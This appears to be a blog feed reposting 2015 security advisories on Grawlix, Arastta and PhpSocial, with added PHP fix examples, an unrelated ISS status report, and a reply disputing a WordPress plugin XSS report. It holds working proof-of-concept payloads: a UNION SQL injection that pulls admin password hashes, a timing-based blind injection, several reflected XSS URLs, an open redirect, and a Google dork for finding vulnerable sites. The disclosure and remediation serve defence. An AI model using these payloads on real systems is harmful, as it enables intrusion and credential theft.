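The redirect() above only inspects destinations that start with "http", so the protocol-relative "//google.com" is passed straight to the Location header. As an added example (not CouchCMS code), the check below decides by parsing the URL and comparing origin components, which also covers backslash variants and non-http schemes; the site URL and fallback are assumed values.

```php
<?php
// Added example (not CouchCMS code): validate a redirect target by origin,
// not by string prefix.

/**
 * Returns $dest if it is safe to redirect to, otherwise $fallback.
 * Accepted: a path on this site ("/couch/..."), or an absolute URL whose
 * scheme, host and port all equal those of $siteUrl.
 */
function safeRedirectTarget(string $dest, string $siteUrl, string $fallback): string
{
    $dest = trim($dest);
    if ($dest === '') {
        return $fallback;
    }
    // Browsers treat "\" like "/" at the start of a URL, so "/\evil.example"
    // and "\\evil.example" are off-site too; normalise before parsing.
    $normalised = str_replace('\\', '/', $dest);

    // Control characters inside the URL are never legitimate.
    if (preg_match('/[\x00-\x1f\x7f]/', $normalised)) {
        return $fallback;
    }

    $parts = parse_url($normalised);
    if ($parts === false) {
        return $fallback;
    }

    // No scheme and no host: a relative reference. Require exactly one
    // leading "/" so that "//host" (host set by parse_url) cannot slip in
    // and a bare "foo/bar" is not resolved against an unknown base.
    if (!isset($parts['scheme']) && !isset($parts['host'])) {
        $onSitePath = $normalised[0] === '/' && ($normalised[1] ?? '') !== '/';
        return $onSitePath ? $normalised : $fallback;
    }

    // Absolute URL: every origin component must match the configured site.
    // "javascript:", "data:" and friends fail on the scheme comparison.
    $site = parse_url($siteUrl);
    $sameOrigin =
        strtolower($parts['scheme'] ?? '') === strtolower($site['scheme'] ?? '')
        && strtolower($parts['host'] ?? '') === strtolower($site['host'] ?? '')
        && ($parts['port'] ?? null) === ($site['port'] ?? null)
        && !isset($parts['user']) && !isset($parts['pass']);
    return $sameOrigin ? $normalised : $fallback;
}

// --- Demo (assumed site URL; K_SITE_URL would play this role in CouchCMS) ---
$site = 'http://localhost/CouchCMS-1.4.5/';
$candidates = [
    '/CouchCMS-1.4.5/couch/',                   // on-site path: accepted
    'http://localhost/CouchCMS-1.4.5/couch/',   // same origin: accepted
    '//google.com',                             // the advisory's bypass: rejected
    '/\\google.com',                            // backslash variant: rejected
    'http://localhost.evil.example/',           // host merely begins with ours: rejected
    'javascript:alert(1)',                      // non-http scheme: rejected
];
foreach ($candidates as $dest) {
    printf("%-42s -> %s\n", $dest, safeRedirectTarget($dest, $site, $site));
}
```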

Source: Gmail -> IFTTT-> Blogger

[FD] Grawlix 1.0.3: Code Execution

Security Advisory - Curesec Research Team

1. Introduction
Affected Product: Grawlix 1.0.3
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://ift.tt/1Yxrde6
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview
CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description: Grawlix is a CMS for publishing comics, which is written in PHP. When uploading an image icon for a link, neither the file type nor the file extension are checked, leading to code execution. It should be noted that admin credentials are required to upload an icon, and that because of a bug when uploading icons, the upload only works if Grawlix is installed in the root directory.

3. Proof of Concept

[FD] Grawlix 1.0.3: CSRF

Security Advisory - Curesec Research Team

1. Introduction
Affected Product: Grawlix 1.0.3
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://ift.tt/1Yxrde6
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview
CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P
Description: Grawlix is a CMS for publishing comics, which is written in PHP. In version 1.0.3, it does not have CSRF protection, which means that an attacker can perform actions for a victim, if the victim visits an attacker controlled site while logged in. An attacker can for example change the password of an existing admin account, which may in turn lead to code execution via a different vulnerability in the admin area.

3. Proof of Concept
Change admin password:

4. Solution
This issue was not fixed by the vendor.

5. Report Timeline
11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/21/2015 Disclosed to public

Blog Reference: http://ift.tt/1NCqXSQ

Source: Gmail -> IFTTT-> Blogger

[FD] Grawlix 1.0.3: XSS

Security Advisory - Curesec Research Team

1. Introduction
Affected Product: Grawlix 1.0.3
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://ift.tt/1Yxrde6
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description: Grawlix is a CMS for publishing comics, which is written in PHP. In version 1.0.3 and possibly prior versions, it contains multiple reflected XSS vulnerabilities. Successful exploitation may lead to the injection of JavaScript keyloggers, the stealing of cookies, or the bypassing of CSRF protection.

3. Details

XSS 1
When searching for a book in the admin area, the keyword parameter is echoed unencoded inside the value attribute of an input tag, leading to XSS.
Proof of Concept:
http://localhost/grawlix-1.0.3/_admin/book.view.php?keyword=" autofocus onfocus="alert(1)
Code: _admin/book.view.php

XSS 2
The slot.label-set.ajax.php script echoes all GET parameters unencoded, leading to XSS.
Proof of Concept:
http://localhost/grawlix-1.0.3/_admin/slot.label-set.ajax.php?x=
Code: _admin/slot.label-set.ajax.php
    echo '
    $_GET|';print_r($_GET);echo '|
    ';

XSS 3
The edit_id parameter of the site.nav-edit.ajax.php is vulnerable to XSS.
Proof of Concept:
http://localhost/grawlix-1.0.3/_admin/site.nav-edit.ajax.php?edit_id=">
Code: _admin/site.nav-edit.ajax.php
    $edit_id = $_GET['edit_id'];
    [...]
    $modal->value($edit_id);
_admin/lib/GrlxForm.php
    $this->value ? $value = ' value="'.$this->value.'"' : null;

XSS 4
When viewing the book overview, the start_sort_order parameter is vulnerable to XSS.
Proof of Concept:
http://localhost/grawlix-1.0.3/_admin/book.view.php?delete_page_id=1&start_sort_order=" onmouseover="alert(1)
Code: _admin/book.view.php
    $delete_link->query("delete_page_id=$val[id]&start_sort_order=$start_sort_order");

XSS 5 (limited)
In two scripts, the page_id value is put into a hidden input element without encoding quotes. It may be possible to execute JavaScript via a style element in older browsers.
Proof of Concept:
http://localhost/grawlix-1.0.3/_admin/sttc.xml-edit.php?msg=created&page_id=" style="STYLE
http://localhost/grawlix-1.0.3/_admin/book.page-edit.php?page_id=" style="STYLE

4. Solution
This issue was not fixed by the vendor.

5. Report Timeline
11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/21/2015 Disclosed to public

Blog Reference: http://ift.tt/1NCqGiG
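The Grawlix findings (and the esoTalk and CouchCMS ones earlier on this page) all come down to request data being interpolated into HTML or into a query string without encoding for that context. This added example, which is not Grawlix code, rebuilds the three affected output patterns (the GrlxForm value attribute, the book.view.php delete link, and the slot.label-set.ajax.php dump) with context-appropriate encoding; the function names are mine.

```php
<?php
// Added example (not Grawlix code): context-aware output encoding for the
// three patterns named in the advisory.

/** Encode a value for use inside a double-quoted HTML attribute or as text. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** The GrlxForm-style value attribute, with the value encoded (XSS 1, 3, 5). */
function valueAttribute(?string $value): string
{
    return ($value !== null && $value !== '')
        ? ' value="' . h($value) . '"'
        : '';
}

/**
 * A delete link like book.view.php's (XSS 4): parameters are URL-encoded by
 * http_build_query(), and the finished URL is HTML-encoded for the attribute.
 */
function deleteLink(string $script, int $pageId, string $startSortOrder): string
{
    $query = http_build_query([
        'delete_page_id'   => $pageId,
        'start_sort_order' => $startSortOrder,
    ]);
    return '<a href="' . h($script . '?' . $query) . '">delete</a>';
}

/** The slot.label-set.ajax.php debug dump (XSS 2), emitted as encoded text. */
function dumpGetParams(array $get): string
{
    return '<pre>$_GET|' . h(print_r($get, true)) . '|</pre>';
}

// --- Demo with the advisory's own inputs ---
$keyword = '" autofocus onfocus="alert(1)';          // XSS 1 input
echo '<input name="keyword"' . valueAttribute($keyword) . '>', "\n";

$sortOrder = '" onmouseover="alert(1)';              // XSS 4 input
echo deleteLink('book.view.php', 1, $sortOrder), "\n";

echo dumpGetParams(['x' => '<script>alert(1)</script>']), "\n";
```

In each case the quote that would have closed the attribute (or the angle bracket that would have opened a tag) is emitted as an entity or a percent-escape, so the browser sees data rather than markup.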

Source: Gmail -> IFTTT-> Blogger

[FD] Arastta 1.1.5: SQL Injection

Security Advisory - Curesec Research Team

1. Introduction
Affected Product: Arastta 1.1.5
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://arastta.org/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview
Arastta is an eCommerce software written in PHP. In version 1.1.5, it is vulnerable to two SQL injection vulnerabilities, one normal injection when searching for products via tags, and one blind injection via the language setting. Both of them require a user with special privileges to trigger.

3. SQL Injection 1
CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description: There is an SQL Injection when retrieving products. Currently, only the "filter" variable is vulnerable. Note that the "tag_name" variable would also be vulnerable to SQL injection, if there wasn't a filter that forbids single quotes in the URL. As defense in depth, it might be a good idea to sanitize that value here as well. Note that an account with the right "Catalog -> Filters" is needed to exploit this issue.

Proof of Concept
POST /Arastta/admin/index.php?route=catalog/product/autocomplete&token=3d6cfa8f9f602a4f47e0dfbdb989a469&filter_name=a&tag_name= HTTP/1.1

tag_text[][value]=abc') union all select password from gv4_user -- -

Code
/admin/model/catalog/product.php
    public function getTags($tag_name, $filter_tags = null) {
        [...]
        $query = $this->db->query("SELECT DISTINCT(tag) FROM `" . DB_PREFIX . "product_description` WHERE `tag` LIKE '%" . $tag_name . "%'" . $filter);

/admin/controller/catalog/product.php
    public function autocomplete() {
        [...]
        if (isset($this->request->get['tag_name'])) {
            $this->load->model('catalog/product');
            if (isset($this->request->get['tag_name'])) {
                $tag_name = $this->request->get['tag_name'];
            } else {
                $tag_name = '';
            }
            $filter = null;
            if(isset($this->request->post['tag_text'])) {
                $filter = $this->request->post['tag_text'];
            }
            $results = $this->model_catalog_product->getTags($tag_name, $filter);
            foreach ($results as $result) {
                $json[] = array(
                    'tag' => $result,
                    'tag_id' => $result
                );
            }
        }

4. SQL Injection 2
CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description: There is a second order timing based SQL injection when choosing the language setting. An admin account with the right "Setting -> Setting" is needed to exploit this issue. Alternatively, a user with the right "Localisation -> Languages" can inject a payload as well. However, a user with the right "Setting -> Setting" is still needed to choose the malicious language to trigger the payload.

Proof of Concept
Visit the setting page: http://localhost/Arastta/admin/index.php?route=setting/setting
For the config_language and config_admin_language parameters use:
en' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) -- -
Visiting any site will trigger the injected code.

Code
/Arastta/system/library/utility.php
    public function getDefaultLanguage(){
        if (!is_object($this->config)) {
            return;
        }
        $store_id = $this->config->get('config_store_id');
        if (Client::isAdmin()){
            $sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_admin_language' AND `store_id` = '" . $store_id . "'";
        } else {
            $sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_language' AND `store_id` = '" . $store_id . "'";
        }
        $query = $this->db->query($sql);
        $code = $query->row['value'];
        $language = $this->db->query("SELECT * FROM " . DB_PREFIX . "language WHERE `code` = '" . $code . "'");
        return $language->row;
    }

5. Solution
This issue was not fixed by the vendor.

6. Report Timeline
11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/17/2015 Disclosed to public

Blog Reference: http://ift.tt/1NCqEY9
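Both injections in this advisory come from building SQL by string concatenation: once from request data (tag_text, and tag_name if the single-quote filter were ever removed) and once, second order, from a value read back out of the setting table. The following is an added example, not Arastta code: getTags() and getDefaultLanguage() rebuilt on PDO prepared statements, with an in-memory SQLite database and constructed rows so it runs stand-alone. It assumes pdo_sqlite is available and treats the posted tag_text values as tags to exclude from the result, which is my reading of the "filter", not something the advisory states.

```php
<?php
// Added example (not Arastta code): the two queries from the advisory with
// every value bound as a parameter, so neither request data nor stored data
// is ever parsed as SQL.

const DB_PREFIX = 'ar_';   // assumed prefix for the demo schema

function openDemoDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $p = DB_PREFIX;
    $db->exec("CREATE TABLE `{$p}product_description` (tag TEXT)");
    $db->exec("CREATE TABLE `{$p}setting` (`key` TEXT, store_id INTEGER, value TEXT)");
    $db->exec("CREATE TABLE `{$p}language` (code TEXT, name TEXT)");
    $db->exec("CREATE TABLE `{$p}user` (password TEXT)");
    // Constructed sample rows.
    $db->exec("INSERT INTO `{$p}product_description` VALUES ('laptop'), ('lamp'), ('50% off')");
    $db->exec("INSERT INTO `{$p}setting` VALUES ('config_language', 0, 'en')");
    $db->exec("INSERT INTO `{$p}language` VALUES ('en', 'English')");
    $db->exec("INSERT INTO `{$p}user` VALUES ('secret-hash')");
    return $db;
}

/** Tag search: the search term and the excluded tags are bound, never concatenated. */
function getTags(PDO $db, string $tagName, array $excluded = []): array
{
    // Escape LIKE wildcards so a search for "50%" matches literally, then bind.
    $like   = '%' . addcslashes($tagName, '%_\\') . '%';
    $sql    = 'SELECT DISTINCT tag FROM `' . DB_PREFIX . 'product_description` '
            . "WHERE tag LIKE :like ESCAPE '\\'";
    $params = [':like' => $like];
    if ($excluded !== []) {
        // One placeholder per posted value; the list length is the only thing
        // that shapes the SQL, the values themselves never touch it.
        $marks = [];
        foreach (array_values($excluded) as $i => $value) {
            $marks[]         = ":ex$i";
            $params[":ex$i"] = (string) $value;
        }
        $sql .= ' AND tag NOT IN (' . implode(', ', $marks) . ')';
    }
    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

/** Language lookup: the code read from the setting table is bound too, closing the second-order path. */
function getDefaultLanguage(PDO $db, int $storeId, bool $isAdmin): ?array
{
    $key  = $isAdmin ? 'config_admin_language' : 'config_language';
    $stmt = $db->prepare('SELECT value FROM `' . DB_PREFIX . 'setting` WHERE `key` = :key AND store_id = :store');
    $stmt->execute([':key' => $key, ':store' => $storeId]);
    $code = $stmt->fetchColumn();
    if ($code === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT * FROM `' . DB_PREFIX . 'language` WHERE code = :code');
    $stmt->execute([':code' => $code]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// --- Demo ---
$db = openDemoDb();
print_r(getTags($db, 'la'));    // ordinary substring search
print_r(getTags($db, '50%'));   // "%" in the input is a literal, not a wildcard
// The advisory's tag_text payload is now just a string that matches no tag.
print_r(getTags($db, 'abc', ["abc') union all select password from " . DB_PREFIX . "user -- -"]));
// A language code that carries SQL stays data: no row, and nothing to time.
$db->prepare('UPDATE `' . DB_PREFIX . 'setting` SET value = :v')
   ->execute([':v' => "en' AND 1=1 -- -"]);
var_dump(getDefaultLanguage($db, 0, false));
```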

Source: Gmail -> IFTTT-> Blogger

[FD] Arastta 1.1.5: XSS

Security Advisory - Curesec Research Team

1. Introduction
Affected Product: Arastta 1.1.5
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://arastta.org/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description: Arastta is an eCommerce software written in PHP. In version 1.1.5, a given URL is echoed unencoded, leading to XSS. This can be used to inject JavaScript keyloggers or to bypass CSRF protection. If the victim is an admin with the right "Tool -> File Manager", this can lead to code execution via the file manager.

3. Proof of Concept
http://localhost/Arastta/index.php/desktops/pc">?sort=pd.name&order=DESC

4. Code
/catalog/view/theme/default/template/common/header.tpl

5. Solution
This issue was not fixed by the vendor.

6. Report Timeline
11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/17/2015 Disclosed to public

Blog Reference: http://ift.tt/1YBdRIz

Source: Gmail -> IFTTT-> Blogger

[FD] PhpSocial v2.0.0304: CSRF

Security Advisory - Curesec Research Team

1. Introduction
Affected Product: PhpSocial v2.0.0304_20222226
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://phpsocial.net
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview
CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P
Description: PhpSocial is a social networking software written in PHP. In version v2.0.0304, it does not have CSRF protection, which means that an attacker can perform actions for a victim, if the victim visits an attacker controlled site while logged in.

3. Proof of Concept
Add a new admin:

4. Solution
This issue was not fixed by the vendor.

5. Report Timeline
11/21/2015 Contacted Vendor (no reply)
12/10/2015 Tried to remind vendor (no email is given, security@phpsocial.net does not exist, and contact form could not be used because the website is down)
12/21/2015 Disclosed to public

Blog Reference: http://ift.tt/1OnBHIb
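The Grawlix CSRF advisory above (change admin password) and this PhpSocial one (add a new admin) describe the same gap: state-changing admin forms with nothing tying the request to the victim's own page. This added example, which is neither project's code, shows the synchroniser-token pattern in PHP; the session is simulated with an array so it runs without a web server, and the handler and field names are mine.

```php
<?php
// Added example (not Grawlix or PhpSocial code): per-session CSRF token,
// embedded in every state-changing form and checked in constant time on POST.

/** Return the session's CSRF token, creating one on first use. */
function csrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Hidden field to place inside every state-changing form. */
function csrfField(array &$session): string
{
    $token = htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="csrf_token" value="' . $token . '">';
}

/**
 * True only for a POST that carries the session's token. hash_equals() avoids
 * leaking the token through comparison timing; a session without a token
 * (nothing was ever rendered to it) fails closed.
 */
function csrfValid(array $session, array $post, string $method): bool
{
    if ($method !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $given    = $post['csrf_token'] ?? '';
    if (!is_string($given) || $expected === '') {
        return false;
    }
    return hash_equals($expected, $given);
}

/** A "change admin password" handler with the check in front of the action. */
function handlePasswordChange(array &$session, array $post, string $method): string
{
    if (!csrfValid($session, $post, $method)) {
        return '403: missing or invalid CSRF token';
    }
    if (!isset($post['password']) || strlen($post['password']) < 12) {
        return '400: password too short';
    }
    $session['password_hash'] = password_hash($post['password'], PASSWORD_DEFAULT);
    return '200: password updated';
}

// --- Demo with a simulated session ---
// In a real deployment also set the session cookie with SameSite=Lax
// (session_set_cookie_params() accepts 'samesite' since PHP 7.3) as a second layer.
$session = ['user' => 'admin'];
echo csrfField($session), "\n";

// A form on a third-party site cannot read the victim's token, so it posts without one.
echo handlePasswordChange($session, ['password' => 'attacker-chosen-pw'], 'POST'), "\n";
// A GET triggered by an <img src=...> never passes, token or not.
echo handlePasswordChange($session, ['password' => 'x', 'csrf_token' => csrfToken($session)], 'GET'), "\n";
// The site's own form carries the token and succeeds.
echo handlePasswordChange($session, ['password' => 'correct horse battery', 'csrf_token' => csrfToken($session)], 'POST'), "\n";
```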

Source: Gmail -> IFTTT-> Blogger

[FD] PhpSocial v2.0.0304: XSS

Security Advisory - Curesec Research Team

1. Introduction
Affected Product: PhpSocial v2.0.0304_20222226
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://phpsocial.net
Vulnerability Type: XSS / Open Redirect
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: PhpSocial is a social networking software written in PHP. In version v2.0.0304, the profile fields Name, Birthday, Street Address, City, State, Country, and Phone Number are open to persistent XSS. This can lead to the stealing of cookies, injection of JavaScript keyloggers, and bypassing of CSRF protection. In this case, this can lead to code execution via the template editor.

3. Proof of Concept
Visit Profile: http://localhost/PhpSocial_v2.0.0304_20222226/cms_phpsocial/Profile.php?user=[USERNAME]
Click edit and use the following for any of the vulnerable fields:

4. Open Redirect
CVSS: Low 2.1 AV:N/AC:H/Au:S/C:N/I:P/A:N
Description: PhpSocial is also vulnerable to a reflected open redirect, which may for example be used in phishing attacks. The attack only works if the victim is logged in to PhpSocial.

Proof of Concept
http://localhost//PhpSocial_v2.0.0304_20222226/cms_phpsocial/UserEditprofileStatus.php?status_new=foobar&task=dosave&return_url=http://google.com

5. Solution
This issue was not fixed by the vendor.

6. Report Timeline
11/21/2015 Contacted Vendor (no reply)
12/10/2015 Tried to remind vendor (no email is given, security@phpsocial.net does not exist, and contact form could not be used because the website is down)
12/21/2015 Disclosed to public

Blog Reference: http://ift.tt/1O9CPgG

Source: Gmail -> IFTTT-> Blogger

ISS Daily Summary Report – 12/22/15

Ocular Health: One year crewmembers Kelly and Kornienko completed vision and tonometry tests and took blood pressure measurements as part of their Flight Day 270 Ocular Health testing. The Ocular Health protocol calls for a systematic gathering of physiological data to characterize the risks of microgravity-induced visual impairment and increased intracranial pressure in ISS crewmembers. Researchers believe that the measurement of visual, vascular and central nervous system changes over the course of this experiment and during the subsequent post-flight recovery will assist in the development of countermeasures, clinical monitoring strategies, and clinical practice guidelines.

Sleep Log: Kelly recorded a Sleep Log entry today. The Sleep ISS-12 experiment monitors ambient light exposure and crew member activity and collects subjective evaluations of sleep and alertness. The investigation examines the effects of space flight and ambient light exposure on sleep during a year-long mission on the ISS.

Veg-01 Anomaly: Kelly refilled the Veg-01 plant pillows with water today. He noted an unexpected growth on the plants and sent pictures for ground experts to evaluate. In coordination with those experts he subsequently removed affected plant areas and double bagged and inserted them into a Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI) for return to the ground. He also increased the Veggie facility fan speed to compensate for extra moisture observed in the pillows and on the plants. The Veg-01 investigation is used to assess on-orbit function and performance of the Veggie facility, focusing on the growth and development of seedlings in the spaceflight environment and the composition of microbial flora on the plants and the facility. For this run, Zinnias will be grown for 60 days and are expected to produce flowers.

Journals: Kelly completed a Journals entry today. The Journals investigation obtains information on behavioral and human issues that are relevant to the design of equipment and procedures used by astronauts during extended-duration missions. Study results provide information used in preparations for future missions to low-Earth orbit and beyond.

Cardio Ox: Peake, with assistance from Kelly, collected blood pressure and ultrasound measurements of his carotid and brachial arteries for this Flight Day 15 Cardio Ox session. The objective of Cardio Ox is to determine whether biological markers of oxidative and inflammatory stress are elevated during and after space flight and whether this results in an increased, long-term risk of atherosclerosis in astronauts. Twelve crewmembers will provide blood and urine samples to assess biomarkers before launch, 15 and 60 days after launch, 15 days before returning to Earth, and within days after landing. Ultrasound scans are obtained at the same time points and through 5 years after landing.

Habitability Video and Observations: Kopra set up his iPad and recorded the first 10 minutes of his exercise session on Treadmill 2 (T2). He narrated details such as hardware interface issues, volume needed to perform exercise, or other human factors concerns for set-up and task performance. He documented additional observations on human factors and habitability from his last 3 to 4 days on the ISS. Topics may include any significant habitability related changes or improvements to the ISS Kopra has noticed since his previous time onboard the ISS. Habitability assesses the relationship between crew members and their environment in order to better prepare for future long-duration spaceflights to destinations, such as near earth asteroids and Mars. Observations recorded during 6 month and 1 year missions can help spacecraft designers determine how much habitable volume is required, and whether a mission's duration impacts how much space crew members need.

Dose Tracker: Kopra and Peake were unable to complete entries for medication tracking because both experienced issues with logging on to the Dose Tracker application that runs on an iPad. Ground experts are working on troubleshooting procedures that are scheduled to be performed on Thursday. This investigation documents the medication usage of crew members before and during their missions by capturing data regarding medication use during spaceflight, including side effect qualities, frequencies and severities. The data are expected to either support or counter anecdotal evidence of medication ineffectiveness during flight and unusual side effects experienced during flight. It is also expected that specific, near-real-time questioning about symptom relief and side effects will provide the data required to establish whether spaceflight-associated alterations in pharmacokinetics (PK) or pharmacodynamics (PD) are occurring during missions.

Human Research Facility (HRF)-2 Resupply: Kopra restocked the HRF supply kits in the HRF2 rack in the Columbus module and removed expired limited life items. He then took photographs of the kits for downlink.

Circadian Rhythms: Peake configured and donned the Armband Monitor and Thermolab sensors and belt for his Flight Day 15 Circadian Rhythm session. He will wear the monitors for 36 hours and then doff and download the data on Thursday. Circadian Rhythms investigates the role of synchronized circadian rhythms, or the "biological clock," and how it changes during long-duration spaceflight. Researchers hypothesize that a non-24-hour cycle of light and dark affects crewmembers' circadian clocks. The investigation also addresses the effects of reduced physical activity, microgravity and an artificially controlled environment. Changes in body composition and body temperature, which also occur in microgravity, can affect crewmembers' circadian rhythms as well. Understanding how these phenomena affect the biological clock will improve performance and health for future crewmembers.

Post-Extravehicular Activity (EVA) Activities: Today, USOS crewmembers participated in an EVA #34 debrief with ground specialists to discuss details of yesterday's EVA. In addition, Kelly and Kopra deconfigured the US Airlock following EVA operations and prepared Extravehicular Mobility Units (EMU) and equipment for stowage.

Today's Planned Activities
All activities were completed unless otherwise noted.
Morning Inspection, Laptop RS1(2) Reboot
RSS1,2 Reboot
SLEEP – Filling in Questionnaire
Morning Inspection, SM ПСС (Caution & Warning Panel) Test
МО-8. HW Setup
Body Mass Measurement
CARDOX
МО-8. Closeout ops
Antivirus Scan Results Checkout on SSC Laptops and Report
Daily Planning Conference (S-band)
WRS – recirculation system tank fill
On MCC Go Regeneration of absorption cartridge Ф2 of TCPU [БМП]
Recharge […]

from ISS On-Orbit Status Report http://ift.tt/1RGiKB2
via IFTTT

Re: [FD] Wordpress Content Text Slider on Post 6.8 - Persistent Vulnerability

The POST request contains a CSRF nonce that is validated by the server and an administrator user is the only role that is able to use the plugin (at least by default). Only an administrator user is able to execute JavaScript using the issue you described due to the limitations I mentioned above. An administrator user already has the permission to embed JavaScript and execute PHP within WordPress as long as they have a valid CSRF nonce. This is a non-issue IMO, although it is recommended that the plugin does sanitise user input and encode user output. But in its current form I cannot see how this is exploitable.

On Tue, Dec 22, 2015 at 3:58 PM, Vulnerability Lab <research@vulnerability-lab.com> wrote:
> Document Title:
> ===============
> Wordpress Content Text Slider on Post 6.8 - Persistent Vulnerability
>
> References (Source):
> ====================
> http://ift.tt/1Z7C5MK
>
> Release Date:
> =============
> 2015-12-07
>
> Vulnerability Laboratory ID (VL-ID):
> ====================================
> 1655
>
> Common Vulnerability Scoring System:
> ====================================
> 3.5
>
> Product & Service Introduction:
> ===============================
> Content text slider on post is a WordPress plugin from gopiplus.com website. We can use this plugin to scroll the content vertically in the posts and pages. We have option to enter content title, description and link for the content. All entered details scroll vertically into the posts and pages. Yes we can enter the html content into the description text area also we can include the images into the scroller.
>
> (Copy of the Vendor Homepage: http://ift.tt/1S89B3A )
>
> Abstract Advisory Information:
> ==============================
> An independent vulnerability laboratory researcher discovered an application-side cross site scripting web vulnerability in the Wordpress Content Text Slider v6.8 web-application.
>
> Vulnerability Disclosure Timeline:
> ==================================
> 2015-12-07: Public Disclosure (Vulnerability Laboratory)
>
> Discovery Status:
> =================
> Published
>
> Affected Product(s):
> ====================
> GoPiPlus
> Product: Content Text Slider On Post - Plugin (Web-Application) 6.8
>
> Exploitation Technique:
> =======================
> Remote
>
> Severity Level:
> ===============
> Medium
>
> Technical Details & Description:
> ================================
> An application-side POST inject web vulnerability has been discovered in the Wordpress Content Text Slider v6.8 web-application. The vulnerability allows remote attackers to inject own malicious script codes to the application-side of the online-service.
>
> The vulnerability is located in the `page` value parameter of the `options-general.php` file. Remote attackers are able to inject via POST method request to the `Title` or `Message/Content` input fields. After that the attacker is able to execute the code by usage of the insert details button. The execution of the malicious injected script code occurs in the `All popups` module when processing to request manually. An attacker is able to steal the admin cookie by usage of a moderator account. The attack vector is persistent on the application-side and the request method to inject is POST.
>
> The security risk of the application-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the application-side web vulnerability requires no privilege web-application user account and only low or medium user interaction. Successful exploitation of the vulnerabilities results in persistent phishing, session hijacking, persistent external redirect to malicious sources and application-side manipulation of affected or connected module context.
>
> Request Method(s):
> [+] POST
>
> Vulnerable File(s):
> [+] options-general.php
>
> Vulnerable Module(s):
> [+] Title or Message/Content
>
> Vulnerable Parameter(s):
> [+] page
>
> Affected Module(s):
> [+] All popups
>
> Proof of Concept (PoC):
> =======================
> The vulnerability can be exploited by remote attackers without privilege web-application user account and low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
>
> Google Dork: inurl:/wp-content/plugins/content-text-slider-on-post/
>
> Manual steps to reproduce the vulnerability ...
> 1. First you should Install content text slider on post
> 2. Add the following details as link
> Note: http://localhost:8080/wp-admin/options-general.php?page=content-text-slider-on-post&ac=add
> 3. In the "Title" or "Message/Content" text area you can input place your javascript code and click on "insert detail" button
> 4. Execute the javascript codes in the "All popups" page
> Note: http://localhost:8080/wp-admin/options-general.php?page=content-text-slider-on-post
> 5. Successful reproduce of the vulnerability!
>
> Note: Attackers can steal admin cookie with moderator access to compromise the account system of the wordpress application and connected dbms.
>
> Security Risk:
> ==============
> The security risk of the persistent POST Inject web vulnerability in the wordpress content text slider module is estimated as medium. (CVSS 3.5)
>
> Credits & Authors:
> ==================
> ALIREZA_PROMIS
